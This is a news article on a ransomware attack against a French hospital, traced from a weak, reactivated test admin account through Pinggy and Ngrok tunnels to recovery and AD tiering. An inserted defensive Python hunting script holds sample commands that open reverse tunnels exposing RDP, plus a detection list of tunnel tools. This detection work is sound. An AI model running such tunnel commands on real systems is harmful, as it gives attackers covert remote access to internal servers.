How a Ransomware Attack Infiltrated Rueil-Malmaison Hospital

Between Ngrok and Pinggy, there were no favorites: the attackers who targeted the Stell Hospital Center in Rueil-Malmaison exploited both of these tunneling services.

It happened last March. The outcome was the deployment of ransomware that encrypted Windows servers. Patient administration tasks, among other things, were unavailable for a period. Personal data may also have been exfiltrated.

A Test Domain Admin Account

The entry point was an old test account, reactivated on March 4, 2025 for a Wi‑Fi audit. This account, with a weak password, possessed domain admin privileges and had VPN access.

The initial access, via this vector, occurred on March 17 (a Monday). On March 22, lateral movement was carried out via an RDP connection to the domain controller. A persistence mechanism was then deployed by installing Pinggy to establish an SSH connection over port 443.

On Friday, March 28, a channel was established between the domain controller and the attacker’s server using Ngrok. The same day, the ransomware was deployed and executed. The following day, traces of the attack on the systems were erased.
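The chain described above (a dormant test account holding domain admin rights and VPN access, then an SSH tunnel on port 443 and Ngrok on the domain controller) can be turned into two simple hunting checks. The following is an added example, not code from the article or from the hospital's team: account names, hosts and the simplified `key=value` event format are constructed, and the `tunnel.pinggy.example` hostname is a placeholder rather than a real service endpoint.

```python
import re
from datetime import date

# Constructed sample directory export (hypothetical names): enabled flag,
# group membership and last interactive logon.
SAMPLE_ACCOUNTS = [
    {"name": "test-wifi-audit", "enabled": True,
     "groups": {"Domain Admins", "VPN Users"}, "last_logon": date(2024, 9, 12)},
    {"name": "j.dupont", "enabled": True,
     "groups": {"Domain Users", "VPN Users"}, "last_logon": date(2025, 3, 14)},
    {"name": "adm-backup", "enabled": True,
     "groups": {"Domain Admins"}, "last_logon": date(2025, 3, 15)},
    {"name": "old-contractor", "enabled": False,
     "groups": {"Domain Admins"}, "last_logon": date(2023, 1, 5)},
]

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
REMOTE_ACCESS_GROUPS = {"VPN Users"}


def risky_privileged_accounts(accounts, as_of, dormant_days=90):
    """Enabled accounts holding domain-level privilege that are either dormant
    (no logon for `dormant_days`) or reachable through remote access (VPN).
    Returns [(name, [reason, ...]), ...] in input order."""
    findings = []
    for acct in accounts:
        if not acct["enabled"] or not (acct["groups"] & PRIVILEGED_GROUPS):
            continue
        reasons = []
        if (as_of - acct["last_logon"]).days > dormant_days:
            reasons.append("dormant")
        if acct["groups"] & REMOTE_ACCESS_GROUPS:
            reasons.append("vpn-reachable")
        if reasons:
            findings.append((acct["name"], reasons))
    return findings


# Constructed process-creation events in a simplified key=value form
# (not a real EDR or Windows event format).
SAMPLE_EVENTS = [
    'ts=2025-03-22T21:40:11 host=DC01 user=test-wifi-audit '
    'image="C:\\Windows\\System32\\OpenSSH\\ssh.exe" '
    'cmdline="ssh -p 443 -R0:localhost:3389 tunnel.pinggy.example"',
    'ts=2025-03-28T08:02:45 host=DC01 user=test-wifi-audit '
    'image="C:\\Users\\Public\\ngrok.exe" cmdline="ngrok tcp 3389"',
    'ts=2025-03-28T09:15:00 host=WS042 user=j.dupont '
    'image="C:\\Windows\\System32\\OpenSSH\\ssh.exe" cmdline="ssh git@git.example"',
    'ts=2025-03-28T09:20:00 host=WS042 user=j.dupont '
    'image="C:\\Program Files\\Git\\bin\\git.exe" cmdline="git pull"',
]

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
TUNNEL_TOOLS = {"ngrok", "pinggy"}  # the two services named in the article


def parse_event(line):
    """Parse one key=value event line; quoted values may contain spaces."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def tunnel_indicators(lines):
    """Flag events that look like tunnelling: a known tunnel tool in the image
    or command line, SSH on port 443, or an SSH remote forward (-R). Events on
    a domain controller (host name starting with DC) get an extra reason."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        exe = ev.get("image", "").rsplit("\\", 1)[-1]
        cmd = ev.get("cmdline", "")
        lowered = (exe + " " + cmd).lower()
        reasons = []
        if any(tool in lowered for tool in TUNNEL_TOOLS):
            reasons.append("tunnel-tool")
        if exe.lower() == "ssh.exe" and re.search(r"-p\s*443\b", cmd):
            reasons.append("ssh-on-443")
        if exe.lower() == "ssh.exe" and re.search(r"\s-R\s*\S+", cmd):
            reasons.append("ssh-reverse-forward")
        if reasons and ev.get("host", "").startswith("DC"):
            reasons.append("on-domain-controller")
        if reasons:
            findings.append({"ts": ev["ts"], "host": ev["host"],
                             "user": ev["user"], "exe": exe, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for name, why in risky_privileged_accounts(SAMPLE_ACCOUNTS, date(2025, 3, 17)):
        print(f"account {name}: {', '.join(why)}")
    for f in tunnel_indicators(SAMPLE_EVENTS):
        print(f"{f['ts']} {f['host']} {f['user']} {f['exe']}: {', '.join(f['reasons'])}")
```

Run against the constructed data, the first check singles out the dormant, VPN-reachable domain admin test account and the second flags both the port-443 SSH reverse forward and the ngrok process on the domain controller, while the ordinary git-over-SSH session on a workstation stays quiet. In practice the account export would come from the directory and the events from the EDR or Sysmon pipeline; the SSH-on-443 rule is deliberately narrow so it does not fire on every outbound SSH session.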

The Stell Hospital Center in Rueil-Malmaison Adopts AD Tiering

Encryption was not observed until Monday, March 31. From that point onward, VPN traffic was severed; the impacted servers were isolated. The next day, backups were taken offline to verify their integrity. The ANSSI and the CERT Santé teams were on-site.

On April 2, the analysis of the compromised servers began. Equipment (workstations, 4G keys, etc.) was requested from the ARS.

Active Directory (AD) reconstruction started on the 7th, in parallel with the completion of the analyses. On the 10th, the switch-over was completed. The backup service was relaunched, the affected business services were restored, and a training session on secure administration was delivered.

The April–May period was marked by the gradual restoration of HR and admissions services, as well as the deployment of new workstations. From June through September, a tiered privilege model for Active Directory was implemented.

Dawn Liphardt

I'm Dawn Liphardt, the founder and lead writer of this publication. With a background in philosophy and a deep interest in the social impact of technology, I started this platform to explore how innovation shapes — and sometimes disrupts — the world we live in. My work focuses on critical, human-centered storytelling at the frontier of artificial intelligence and emerging tech.